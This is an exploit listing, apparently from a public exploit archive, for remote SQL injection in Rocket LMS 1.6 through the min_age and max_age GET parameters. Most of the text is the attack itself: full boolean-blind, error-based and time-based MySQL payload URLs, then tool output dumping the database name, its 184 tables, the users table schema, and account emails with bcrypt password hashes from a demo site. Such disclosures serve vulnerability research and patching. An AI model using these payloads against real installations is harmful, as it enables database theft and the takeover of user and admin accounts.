Exploit for Rocket LMS 1.6 SQL Injection

Name: Exploit for Rocket LMS 1.6 SQL Injection
Rating: 5 (158 reviews)
2022-09-16 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:168402
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr │ │ :  
│ Website : rocket-soft.org │ │ Rocket LMS - Learning Management System │  
│ Vendor : RocketSoft │ │ │  
│ Software : Rocket LMS v 1.6 │ │ is an online course marketplace with a │  
│ Vuln Type: Remote SQL Injection │ │ pile of features that helps you to run │  
│ Method : GET │ │ your online education business easily │  
│ Impact : Database Access │ │ │  
│ │ │ │  
│────────────────────────────────────────────┘ └─────────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL   
Ivo @palaziv  
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
GET parameter 'min_age' is vulnerable  
  
---  
Parameter: min_age (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
---  
  
  
GET parameter 'max_age' is vulnerable  
  
---  
Parameter: max_age (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=  
---   
  
  
[+] Starting the Attack  
  
[INFO] fetching current database  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache 2, PHP 7.4.30  
back-end DBMS: MySQL >= 5.6  
  
current database: 'admin_learn'  
  
  
[INFO] fetching tables for database: 'admin_learn'  
  
Database: admin_learn  
[184 tables]  
+------------------------------------------------+  
| groups |  
| accounting |  
| advertising_banners |  
| advertising_banners_translations |  
| affiliates |  
| affiliates_codes |  
| agora_history |  
| badge_translations |  
| badges |  
| become_instructors |  
| blog |  
| blog_categories |  
| blog_translations |  
| bundle_filter_option |  
| bundle_translations |  
| bundle_webinars |  
| bundles |  
| cart |  
| categories |  
| category_translations |  
| certificate_template_translations |  
| certificates |  
| certificates_templates |  
| comments |  
| comments_reports |  
| contacts |  
| course_forum_answers |  
| course_forums |  
| course_learning |  
| course_noticeboard_status |  
| course_noticeboards |  
| delete_account_requests |  
| discount_categories |  
| discount_courses |  
| discount_groups |  
| discount_users |  
| discounts |  
| faq_translations |  
| faqs |  
| favorites |  
| feature_webinar_translations |  
| feature_webinars |  
| file_translations |  
| files |  
| filter_option_translations |  
| filter_options |  
| filter_translations |  
| filters |  
| follows |  
| forum_featured_topics |  
| forum_recommended_topic_items |  
| forum_recommended_topics |  
| forum_topic_attachments |  
| forum_topic_bookmarks |  
| forum_topic_likes |  
| forum_topic_posts |  
| forum_topic_reports |  
| forum_topics |  
| forum_translations |  
| forums |  
| group_users |  
| groups_registration_packages |  
| home_sections |  
| jazzcash_transactions |  
| meeting_times |  
| meetings |  
| migrations |  
| navbar_button_translations |  
| navbar_buttons |  
| newsletters |  
| newsletters_history |  
| noticeboards |  
| noticeboards_status |  
| notification_templates |  
| notifications |  
| notifications_status |  
| offline_payments |  
| order_items |  
| orders |  
| page_translations |  
| pages |  
| password_resets |  
| payku_payments |  
| payku_transactions |  
| payment_channels |  
| payouts |  
| payu_transactions |  
| permissions |  
| prerequisites |  
| product_categories |  
| product_category_translations |  
| product_discounts |  
| product_faq_translations |  
| product_faqs |  
| product_file_translations |  
| product_files |  
| product_filter_option_translations |  
| product_filter_options |  
| product_filter_translations |  
| product_filters |  
| product_media |  
| product_orders |  
| product_reviews |  
| product_selected_filter_options |  
| product_selected_specification_multi_values |  
| product_selected_specification_translations |  
| product_selected_specifications |  
| product_specification_categories |  
| product_specification_multi_value_translations |  
| product_specification_multi_values |  
| product_specification_translations |  
| product_specifications |  
| product_translations |  
| products |  
| promotion_translations |  
| promotions |  
| purchases |  
| quiz_question_translations |  
| quiz_translations |  
| quizzes |  
| quizzes_questions |  
| quizzes_questions_answer_translations |  
| quizzes_questions_answers |  
| quizzes_results |  
| rating |  
| regions |  
| registration_packages |  
| registration_packages_translations |  
| reserve_meetings |  
| rewards |  
| rewards_accounting |  
| roles |  
| sales |  
| sales_log |  
| sections |  
| session_reminds |  
| session_translations |  
| sessions |  
| setting_translations |  
| settings |  
| special_offers |  
| subscribe_reminds |  
| subscribe_translations |  
| subscribe_uses |  
| subscribes |  
| support_conversations |  
| support_department_translations |  
| support_departments |  
| supports |  
| tags |  
| testimonial_translations |  
| testimonials |  
| text_lesson_translations |  
| text_lessons |  
| text_lessons_attachments |  
| ticket_translations |  
| ticket_users |  
| tickets |  
| trend_categories |  
| users |  
| users_badges |  
| users_cookie_security |  
| users_manual_purchase |  
| users_metas |  
| users_occupations |  
| users_registration_packages |  
| users_zoom_api |  
| verifications |  
| webinar_assignment_attachments |  
| webinar_assignment_history |  
| webinar_assignment_history_messages |  
| webinar_assignment_translations |  
| webinar_assignments |  
| webinar_chapter_items |  
| webinar_chapter_translations |  
| webinar_chapters |  
| webinar_extra_description_translations |  
| webinar_extra_descriptions |  
| webinar_filter_option |  
| webinar_partner_teacher |  
| webinar_reports |  
| webinar_reviews |  
| webinar_translations |  
| webinars |  
+------------------------------------------------+  
  
  
[INFO] fetching columns for table 'users' in database 'admin_learn'  
  
Database: admin_learn  
Table: users  
[49 columns]  
  
+--------------------+-------------------------------------+  
| Column | Type |  
+--------------------+-------------------------------------+  
| language | varchar(255) |  
| about | text |  
| access_content | tinyint(1) |  
| account_id | varchar(128) |  
| account_type | varchar(128) |  
| address | varchar(255) |  
| affiliate | tinyint(1) |  
| avatar | varchar(255) |  
| avatar_settings | varchar(255) |  
| ban | tinyint(1) |  
| ban_end_at | int(10) unsigned |  
| ban_start_at | int(10) unsigned |  
| bio | varchar(128) |  
| can_create_store | tinyint(1) |  
| certificate | varchar(128) |  
| city_id | int(10) unsigned |  
| commission | int(10) unsigned |  
| country_id | int(10) unsigned |  
| cover_img | varchar(255) |  
| created_at | int(11) |  
| deleted_at | int(11) |  
| district_id | int(10) unsigned |  
| email | varchar(255) |  
| facebook_id | varchar(255) |  
| financial_approval | tinyint(1) |  
| full_name | varchar(128) |  
| google_id | varchar(255) |  
| headline | varchar(255) |  
| iban | varchar(128) |  
| id | int(10) unsigned |  
| identity_scan | varchar(128) |  
| level_of_training | bit(3) |  
| location | point |  
| meeting_type | enum('all','in_person','online') |  
| mobile | varchar(32) |  
| newsletter | tinyint(1) |  
| offline | tinyint(1) |  
| offline_message | text |  
| organ_id | int(11) |  
| password | varchar(255) |  
| province_id | int(10) unsigned |  
| public_message | tinyint(1) |  
| remember_token | varchar(255) |  
| role_id | int(10) unsigned |  
| role_name | varchar(64) |  
| status | enum('active','pending','inactive') |  
| timezone | varchar(255) |  
| updated_at | int(11) |  
| verified | tinyint(1) |  
+--------------------+-------------------------------------+  
  
  
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'  
  
Database: admin_learn  
Table: users  
[4 entries]  
  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
| id | account_id | account_type | email | password |  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
| 1 | NULL | NULL | admin@demo.com | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |  
| 867 | NULL | NULL | organization@demo.com | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |  
| 995 | NULL | NULL | student@demo.com | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |  
| 1015 | NULL | NULL | instructor@demo.com | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
  
  
[-] Done